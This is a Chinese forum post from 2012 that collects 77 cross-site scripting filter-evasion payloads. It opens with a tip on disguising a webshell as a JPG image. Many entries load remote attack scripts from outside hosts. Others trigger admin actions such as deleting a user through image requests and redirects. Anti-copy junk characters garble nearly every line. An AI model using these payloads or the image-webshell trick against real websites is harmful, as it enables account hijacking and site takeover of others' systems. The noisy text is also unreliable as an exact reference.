跨站图片shell1 I' U2 k3 Q5 E
XSS跨站代码 <script>alert("")</script>5 }) y2 S3 g6 w# t/ [
+ J1 K; K3 h; k8 \$ v* {
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马6 c( P w5 o1 Q0 z+ O
9 W' B% k" c j+ S% Q0 @* S
5 R& `' ^2 D, o. V1 b: i# ~
1 |* q( |) X( k/ O* v1)普通的XSS JavaScript注入
9 O5 l; v/ X' ]! z, O9 M<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>9 ^! p! o- O' G7 |% C
' f9 Z0 j! J' D1 g(2)IMG标签XSS使用JavaScript命令
3 v1 g" }( C/ K3 q0 @( p; U0 C9 n<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- O% L8 y/ C/ c3 X+ M( u* `; p! O" b7 w) |1 Q1 ?
(3)IMG标签无分号无引号
2 T3 d# m1 E9 Z# H1 a- i/ X<IMG SRC=javascript:alert(‘XSS’)>
- u3 b; ?' o, _; E, A1 N* W n, ? s
(4)IMG标签大小写不敏感. U2 q' C- U4 w/ K, Y: e
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>( m0 w2 s& ^: M/ Y
# Z8 k/ h/ ~' a9 C0 g! M(5)HTML编码(必须有分号)
) a8 L2 Q) Z0 {- I6 Z+ f: n<IMG SRC=javascript:alert(“XSS”)>
, H; v# H& B5 G1 ]% O* i6 i
. P2 x& n. S; c. X8 Q(6)修正缺陷IMG标签
# l8 k! s* V5 d& b<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
% `3 H7 u6 x/ W; S! c# `" d) B" F2 U3 l/ J& Y
(7)formCharCode标签(计算器)3 f' L9 v8 D# z' e2 Y& r; P
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+ C+ t. A c4 y& `: a
' b5 x) m7 y+ F% _' E" E(8)UTF-8的Unicode编码(计算器)
% x! B9 a$ L+ { v4 d<IMG SRC=jav..省略..S')>
: W) U4 H, b, H& s; G
1 }+ n7 y1 e/ z- y4 e9 x: _(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 x) k4 a0 T& g) A1 [3 H, c<IMG SRC=jav..省略..S')>
9 [9 c# ?; o$ p0 _, N" G! N3 `, }& G- u& u
(10)十六进制编码也是没有分号(计算器)
) I9 Y1 T6 s4 {. y U3 o<IMG SRC=java..省略..XSS')>
4 d3 M3 I3 u' k1 E' [8 O# v; \; E# X/ h7 t* A0 O& z( t) z/ m
(11)嵌入式标签,将Javascript分开0 J4 ?% r4 u* v" E2 ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( v( Q5 S) a, X5 Z
# J& U, M; H4 o- p(12)嵌入式编码标签,将Javascript分开
8 n! F3 t& p& x) s7 i s: ^. C<IMG SRC=”jav ascript:alert(‘XSS’);”>, ~: C: ]3 l" A! [
7 x) P1 n. s( Z9 q- q6 O
(13)嵌入式换行符, Z0 B7 A. n* F0 C: {$ s' S
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* q8 j" A7 F/ m8 J$ G5 h T: X' y @% o8 W& J( ^/ P9 S, v
(14)嵌入式回车/ X# \0 p: E% X2 c, T( W
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; |% [0 p4 p1 P6 r' t5 V0 {- e& D6 d9 ~6 R5 m
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 I4 a( l# O. S% g. Y% D6 w<IMG SRC=”javascript:alert(‘XSS‘)”>
$ E3 O& F: E8 @7 C3 b& c& e; J: W' y4 w) J! o0 j
(16)解决限制字符(要求同页面)6 h- y* T* \) r* C. \1 X
<script>z=’document.’</script>- f- m2 U& i) G" ~
<script>z=z+’write(“‘</script>
5 F1 r$ n8 J; W8 v. F3 J9 c. q<script>z=z+’<script’</script>
$ t9 Z% J% P8 S8 h7 V1 _6 I; |<script>z=z+’ src=ht’</script>5 R9 T7 f: E8 W" K9 `( i* w& x! C0 I
<script>z=z+’tp://ww’</script>6 W A7 ^. c9 {8 f
<script>z=z+’w.shell’</script> \5 r! ~6 r* V& Y9 h& Z
<script>z=z+’.net/1.’</script>9 j5 g8 K2 L. [# ]3 e3 G5 @
<script>z=z+’js></sc’</script>1 C+ p; k5 b% \6 O
<script>z=z+’ript>”)’</script>
5 }% |- W' {5 j% g7 t) \) m6 M8 g<script>eval_r(z)</script>1 [' s4 N+ G0 w+ ~
4 u- w! g; b+ C. z# G
(17)空字符" _" t5 K+ H, Y
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
) T+ m. R3 X: R0 ?* p- B: W$ l. G
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用( L6 S, p$ B: f$ G/ W1 z; w
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
9 B- ?( k5 q! u$ a6 ]- E# Q* i
(19)Spaces和meta前的IMG标签7 F1 ]) J, \. S$ I' e8 `$ Y, F
<IMG SRC=” javascript:alert(‘XSS’);”>
9 s7 K% e" S/ |$ }' g
' p% A2 V! B/ c5 o(20)Non-alpha-non-digit XSS9 }. n/ \, R+ p+ R: M1 E' I% W
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT># k4 C8 q! l5 l x0 `2 Q) a* F
* Q0 `# s& O' V6 N8 o
(21)Non-alpha-non-digit XSS to 23 z3 t% ^. b) u. M2 A8 `
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 D! T2 [% O) {& o7 @5 x3 d: O1 Y5 ^& N! i" n$ G! A
(22)Non-alpha-non-digit XSS to 3
1 A& i# v( V9 C" ^& Q' W<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" H8 r l& Y' M3 V% k, r/ @- o$ y2 v2 [
(23)双开括号5 \% N! z- W4 C$ t0 H* n& Y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
9 d$ \7 z$ ^" v+ [( K. u( F2 y
6 O% `6 d5 a. b4 W(24)无结束脚本标记(仅火狐等浏览器)
4 M6 a$ N% K% J' L( C<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
3 A3 M) t+ U; \4 f, Q* x" w# Z
, F9 b2 s! o* A0 y! d8 W(25)无结束脚本标记2% j: }4 n( c, Q9 M I+ ^& W$ L
<SCRIPT SRC=//3w.org/XSS/xss.js>! S" f$ \: \8 t9 x
! t8 m: D5 T" Q9 q1 o% e& |- `
(26)半开的HTML/JavaScript XSS
' D' d# f* L& `3 O) ]0 o<IMG SRC=”javascript:alert(‘XSS’)”' f2 b5 w' \3 w1 K; _5 F% e8 S
! e" s* Z+ l7 [4 U: o6 R' c4 A3 R
(27)双开角括号
; W& z9 Z# X% ~, A' d1 s, ?<iframe src=http://3w.org/XSS.html </ b8 ?- F: u( n% J& N! {6 ~2 j
1 N7 ~. W/ m: W0 q6 Q1 r(28)无单引号 双引号 分号
2 `# T4 M. S: M<SCRIPT>a=/XSS/
* Y% q8 W4 k4 m; ]3 h4 halert(a.source)</SCRIPT>2 o1 g+ X$ ]! t: T$ ~
/ M1 ?$ d, w) Z* C0 C(29)换码过滤的JavaScript
# I# h O' C9 R) L5 J; [: X8 M n\”;alert(‘XSS’);//" o0 |5 K% H% x7 b2 u: V
2 a& T8 D' W2 U! C
(30)结束Title标签2 |; S$ ?% U, W ~# `
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>, R- f, q# J! p) H9 I9 i! q T
4 }! o& x2 s5 u8 T) I7 `1 r(31)Input Image# l7 ?; u- [- b7 h) d
<INPUT SRC=”javascript:alert(‘XSS’);”>
# G, v$ X- d& {$ Y' r* c! h% |4 }3 }3 f/ y8 Y" O
(32)BODY Image$ y6 Y' ?! G7 C
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>& [9 Q/ i8 d7 c1 D+ b
7 y+ m/ v, N. X( E! \! I
(33)BODY标签
7 O4 N5 @$ I' w' f0 i3 L<BODY(‘XSS’)>, I+ b" U# T% ?- D
/ R% b$ y: T T! P; U: Q' |
(34)IMG Dynsrc$ I: g& @+ l8 K4 |! H
<IMG DYNSRC=”javascript:alert(‘XSS’)”>. P) Q6 q' [% q( U! r
# c" w0 p' E; e& j
(35)IMG Lowsrc: l& P& ]8 x& y6 M
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
. `& b% z$ f9 s, I- w/ |( e( u5 T/ |% l# X- E2 U
(36)BGSOUND4 a' \7 y1 Q: K) E
<BGSOUND SRC=”javascript:alert(‘XSS’);”> q9 z; y1 z. m
) q7 a' Y2 @3 T: Z
(37)STYLE sheet, D9 c$ U. @ W" \; R& N
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
9 v/ W0 `7 T& g, w. W- [1 k6 W6 Z* S$ z* H6 H8 ]# n# y
(38)远程样式表
1 p& C4 T8 `$ u<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”># |) Q K( U' M2 j2 O3 c% p
2 f/ r! n" k! ^
(39)List-style-image(列表式)" t0 J+ a9 g, e( w5 c' R# e# Q, M
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! W9 m! y& g: b2 U2 r
* _8 z1 j3 R3 C! T/ W7 d6 R( z(40)IMG VBscript
( @! n$ l& }6 j4 Z- z+ u @<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS0 ^4 m/ j) F9 D) j4 c
0 C8 y) U4 L3 ^$ C! [5 S(41)META链接url |! G& s3 p1 @; V9 @/ r$ z; ]
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>4 R: T0 ^" Z( u8 m' w
: y$ q9 X1 D! h# N; G5 B' x
(42)Iframe
v y% N$ b- l, o3 k<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 h7 q" j1 U. J2 A! L(43)Frame
`9 M1 {9 M1 b" O<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
9 F8 r6 ], F" F- h- z
- K5 b: `8 e: |# J6 N8 C5 r(44)Table
: C! v( g, \4 S<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
0 u$ V% F# n; d+ R/ N: b0 R8 }8 E
: h4 l- X+ c) s8 r' T( t W(45)TD
; R6 Z9 w$ g/ L4 V5 m+ N<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
3 f7 o' d/ V5 E1 G4 b3 n" A6 D' ]+ w" h- d z, G7 h
(46)DIV background-image7 {% ]* N9 \! E4 ]
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 V1 P g' t5 u b2 c3 D" y7 q6 Q& s z+ z& u
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
7 G1 W* a/ z9 `2 Q' P: i<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>: I8 ? h* g8 R, [% b
; P9 {7 R# Y) z& ~. t8 c" D
(48)DIV expression
- X, R6 d2 b' y8 `8 ?3 D<DIV STYLE=”width: expression_r(alert(‘XSS’));”>2 B; p% ] ~% a& F
& Z7 O, Z( n! Q, _" _( b- g, x! j2 x" B
(49)STYLE属性分拆表达: e# z: J; `* A- }% M$ A
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
' r6 X3 W* ]3 o4 s; [ U! \, x
5 U7 Y+ @& U6 b3 _2 \1 m(50)匿名STYLE(组成:开角号和一个字母开头)
, a6 i: o9 S8 a<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>7 Q2 M1 X+ a: Z2 w& a6 s
% ?( R* E8 E3 {. w% V7 u
(51)STYLE background-image
5 M7 h* X: o+ t, m- E( u3 C, M- ?<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
$ [5 o. ^) \- q( L- g) F
z- \: I7 g+ O+ Y* i(52)IMG STYLE方式
v9 p& s T+ X, ?- eexppression(alert(“XSS”))’>
+ z6 U( C4 l1 m; R8 Q* N- B- e9 [2 u7 B' t: Q$ G
(53)STYLE background
( E+ w% x- V5 \; t% I<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>. |& s- Y6 T& c$ P. C+ y3 b( [4 _
1 D9 M) x. o' p' [$ ^6 p
(54)BASE
+ ~) x, ~ ]4 g% t<BASE HREF=”javascript:alert(‘XSS’);//”>6 u4 Z6 ~' k& l1 `8 s) g5 V8 t2 R6 |4 a
7 m h9 v3 X: u7 d9 }% w; c* j" ~
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS' T" E& h# l$ y" I. Y2 `
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
8 e- b1 q' {* J" k! j6 C1 M1 v& K% Z7 K8 O8 X1 i
(56)在flash中使用ActionScrpt可以混进你XSS的代码! j3 S: ]3 {2 |; n
a=”get”;/ O r: R6 H4 K- z. S3 _
b=”URL(\”";
; ^) @2 V" P6 Q2 r: gc=”javascript:”;
- k& {7 x) Z3 P+ P- ad=”alert(‘XSS’);\”)”;, @, Z; `7 a8 W2 v0 b M' W( \
eval_r(a+b+c+d);1 F5 h4 z9 o7 U% K0 R
* R9 Z V& ?6 d" K9 O
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上( k0 |& S& Q- o8 K0 [* Z
<HTML xmlns:xss>+ u+ q) H' \( X: ~2 J! R
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>! ^' r- O+ S) b3 _
<xss:xss>XSS</xss:xss>
, W0 X& S, e) U7 Q* ^9 n</HTML>
1 Z) m- w) S/ w
" q7 R" T; _* P- Y6 o; R* l(58)如果过滤了你的JS你可以在图片里添加JS代码来利用& o4 c3 f A; U' U+ x
<SCRIPT SRC=””></SCRIPT>- B w9 O4 b) m' P! r- s1 e( T
: E! O7 a1 t7 }# @# O4 G/ W(59)IMG嵌入式命令,可执行任意命令
$ z" j" d* i/ q. `/ b* A" B<IMG SRC=”http://www.XXX.com/a.php?a=b”>& I. G" U& L T
; L& v' u3 F f, ~7 f3 {
(60)IMG嵌入式命令(a.jpg在同服务器)( a0 F( k7 w8 m, b$ N9 @
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- \; N% E7 z! _* w! K7 H! F
0 O! |7 Q& h9 b# j
(61)绕符号过滤
0 Q% ]0 _/ y* ?. n<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 m1 f" m+ p$ Q& v5 v
$ L& t7 P5 e2 m5 k(62)
6 C- G6 y0 A7 j4 \# ~<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT># m" f. v2 W- E; A, n7 N8 H
5 j, `! _* ?- T1 ?( b; n9 [; a7 x% @
(63)
2 R* H6 Q9 P( V5 |* k1 P$ O& k2 p<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>" R) Y( _# F- f0 t" O4 [" s& R+ e
9 G# E, n) M; g2 | S9 h, F
(64)
9 i8 I8 o1 c* R* _' ~<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>* `) z; H8 l# t1 L
8 y. v1 e. W. D5 a1 ]" _
(65)( d% }0 `8 J( m/ L2 }3 }& U
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
$ U6 w1 N* }- U, W) F. `. d$ t
(66)
- \; C3 Y8 \* E1 S* r6 c. M<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 S" ^$ f+ x* S/ N
' g5 R2 f% a/ g" y(67)
6 L- {2 b \! _1 _% m" h<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>: z+ ]8 f# d- Z) B
) f3 J+ H3 Y' w7 E; O- Q9 z- {
(68)URL绕行" u" Y4 V: Q1 s& b ]
<A HREF=”http://127.0.0.1/”>XSS</A>, `9 h" N: R! J% k7 \
) ]4 g) s2 x. N- n(69)URL编码
9 { p8 l9 [% D6 `9 x8 g<A HREF=”http://3w.org”>XSS</A>
8 ^# \9 A' V& v" L9 A
6 k6 i3 [4 b/ S(70)IP十进制* e$ N# f1 I7 o) E2 p! b
<A HREF=”http://3232235521″>XSS</A> W) f1 P0 H* ^9 E0 z/ M1 u
7 f: J: J3 M! o2 b1 _4 J
(71)IP十六进制7 W; O7 S) K$ @) w' ~
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
7 ]2 j* p+ U3 m& t0 c; @1 g7 t/ c ?, _* ^
(72)IP八进制
4 {2 F+ M7 z4 p) F4 G<A HREF=”http://0300.0250.0000.0001″>XSS</A>
f* k6 i- M- O$ y1 C
7 s; F4 |' ]; Y( w& r(73)混合编码
; w6 U2 u/ d" B- k1 K, W2 o<A HREF=”h
" N3 T+ w# n" m o, Ftt p://6 6.000146.0×7.147/”">XSS</A>
8 I9 d2 J9 F- e* i" [. P. |
8 b2 Q3 W' m0 K0 A3 L" @" B. m, R$ U(74)节省[http:]
' A4 C5 E# B* V3 w/ l2 Q<A HREF=”//www.google.com/”>XSS</A>
3 m, I# G7 O0 v7 W3 J) B, S
. X2 Q0 K. w+ ~' u(75)节省[www]
1 b5 H: R& @; M# D/ W<A HREF=”http://google.com/”>XSS</A>
: O( k3 C. S5 M
# Z0 j( a0 |5 K9 {1 P" ^(76)绝对点绝对DNS
' T% e! V, W0 ^2 i# i3 Z<A HREF=”http://www.google.com./”>XSS</A>
7 A" u& e6 w! O1 G) w! E( m/ T9 o7 ]) d2 b' L7 O* g9 `; v$ s' N. @
(77)javascript链接3 X: e4 |, i. N; P
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>$ I; D$ I. P$ `( e
|
发表于 2012-9-13 17:04:56
收藏
支持
反对